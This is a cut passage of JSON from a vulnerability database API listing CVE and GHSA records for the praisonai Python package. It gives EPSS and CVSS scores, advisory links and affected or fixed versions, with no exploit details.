D-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.90"}],"aliases":["CVE-2026-34934","GHSA-9cq8-3v94-434g"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9xhc-88h5-uya7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330603?format=json","vulnerability_id":"VCID-as2k-h8e6-2bbg","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39307","reference_id":"","reference_type":"","scores":[{"value":"0.00068","scoring_system":"epss","scoring_elements":"0.21235","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39307"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4ph2-f6pf-79wv","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:39:52Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4ph2-f6pf-79wv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39307","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39307"},{"reference_url":"https://github.com/advisories/GHSA-4ph2-f6pf-79wv","reference_id":"GHSA-4ph2-f6pf-79wv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4ph2-f6pf-79wv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188803?format=json","purl":"pkg:pypi/praisonai@4.5.113","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-5f3z-55fe-7kh7"},{"vulnerability":"VCID-5x3f-r7ft-3ke4"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-qg8p-cewa-6khr"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.113"}],"aliases":["CVE-2026-39307","GHSA-4ph2-f6pf-79wv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-as2k-h8e6-2bbg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/332727?format=json","vulnerability_id":"VCID-b346-avpg-nqex","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41496","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02619","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41496"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-rg3h-x3jw-7jm5","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T23:17:23Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-rg3h-x3jw-7jm5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41496","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41496"},{"reference_url":"https://github.com/advisories/GHSA-rg3h-x3jw-7jm5","reference_id":"GHSA-rg3h-x3jw-7jm5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rg3h-x3jw-7jm5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188936?format=json","purl":"pkg:pypi/praisonai@4.5.149","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.149"}],"aliases":["CVE-2026-41496","GHSA-rg3h-x3jw-7jm5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-b346-avpg-nqex"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330604?format=json","vulnerability_id":"VCID-bm8e-na69-2qhr","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39308","reference_id":"","reference_type":"","scores":[{"value":"0.00095","scoring_system":"epss","scoring_elements":"0.2634","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39308"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-r9x3-wx45-2v7f","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:07:44Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-r9x3-wx45-2v7f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39308","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39308"},{"reference_url":"https://github.com/advisories/GHSA-r9x3-wx45-2v7f","reference_id":"GHSA-r9x3-wx45-2v7f","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r9x3-wx45-2v7f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188803?format=json","purl":"pkg:pypi/praisonai@4.5.113","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-5f3z-55fe-7kh7"},{"vulnerability":"VCID-5x3f-r7ft-3ke4"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-qg8p-cewa-6khr"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.113"}],"aliases":["CVE-2026-39308","GHSA-r9x3-wx45-2v7f"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bm8e-na69-2qhr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331878?format=json","vulnerability_id":"VCID-ceav-utcz-33fc","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40148","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17303","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40148"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-f2h6-7xfr-xm8w","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:39:35Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-f2h6-7xfr-xm8w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40148","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40148"},{"reference_url":"https://github.com/advisories/GHSA-f2h6-7xfr-xm8w","reference_id":"GHSA-f2h6-7xfr-xm8w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f2h6-7xfr-xm8w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40148","GHSA-f2h6-7xfr-xm8w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ceav-utcz-33fc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330602?format=json","vulnerability_id":"VCID-e9s4-2q39-97bu","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39306","reference_id":"","reference_type":"","scores":[{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16744","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39306"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4rx4-4r3x-6534","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T18:31:17Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4rx4-4r3x-6534"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39306","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39306"},{"reference_url":"https://github.com/advisories/GHSA-4rx4-4r3x-6534","reference_id":"GHSA-4rx4-4r3x-6534","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4rx4-4r3x-6534"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188803?format=json","purl":"pkg:pypi/praisonai@4.5.113","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-5f3z-55fe-7kh7"},{"vulnerability":"VCID-5x3f-r7ft-3ke4"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-qg8p-cewa-6khr"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.113"}],"aliases":["CVE-2026-39306","GHSA-4rx4-4r3x-6534"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e9s4-2q39-97bu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/329933?format=json","vulnerability_id":"VCID-gtfg-wf6b-p7et","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34955","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.04025","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34955"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-r4f2-3m54-pp7q","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-06T19:06:05Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-r4f2-3m54-pp7q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34955","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34955"},{"reference_url":"https://github.com/advisories/GHSA-r4f2-3m54-pp7q","reference_id":"GHSA-r4f2-3m54-pp7q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r4f2-3m54-pp7q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188313?format=json","purl":"pkg:pypi/praisonai@4.5.97","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-5f3z-55fe-7kh7"},{"vulnerability":"VCID-5x3f-r7ft-3ke4"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-as2k-h8e6-2bbg"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-bm8e-na69-2qhr"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-e9s4-2q39-97bu"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m1vr-ksyx-ebh1"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-qg8p-cewa-6khr"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.97"}],"aliases":["CVE-2026-34955","GHSA-r4f2-3m54-pp7q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gtfg-wf6b-p7et"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/329931?format=json","vulnerability_id":"VCID-hby8-eypb-3ubk","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34953","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06127","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34953"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-98f9-fqg5-hvq5","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:04:51Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-98f9-fqg5-hvq5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34953","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34953"},{"reference_url":"https://github.com/advisories/GHSA-98f9-fqg5-hvq5","reference_id":"GHSA-98f9-fqg5-hvq5","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-98f9-fqg5-hvq5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188313?format=json","purl":"pkg:pypi/praisonai@4.5.97","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-5f3z-55fe-7kh7"},{"vulnerability":"VCID-5x3f-r7ft-3ke4"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-as2k-h8e6-2bbg"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-bm8e-na69-2qhr"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-e9s4-2q39-97bu"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m1vr-ksyx-ebh1"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-qg8p-cewa-6khr"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.97"}],"aliases":["CVE-2026-34953","GHSA-98f9-fqg5-hvq5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hby8-eypb-3ubk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330324?format=json","vulnerability_id":"VCID-jpgv-pkzg-yfh6","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35615","reference_id":"","reference_type":"","scores":[{"value":"0.00084","scoring_system":"epss","scoring_elements":"0.2447","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35615"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:08:17Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-693f-pf34-72c5","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scorin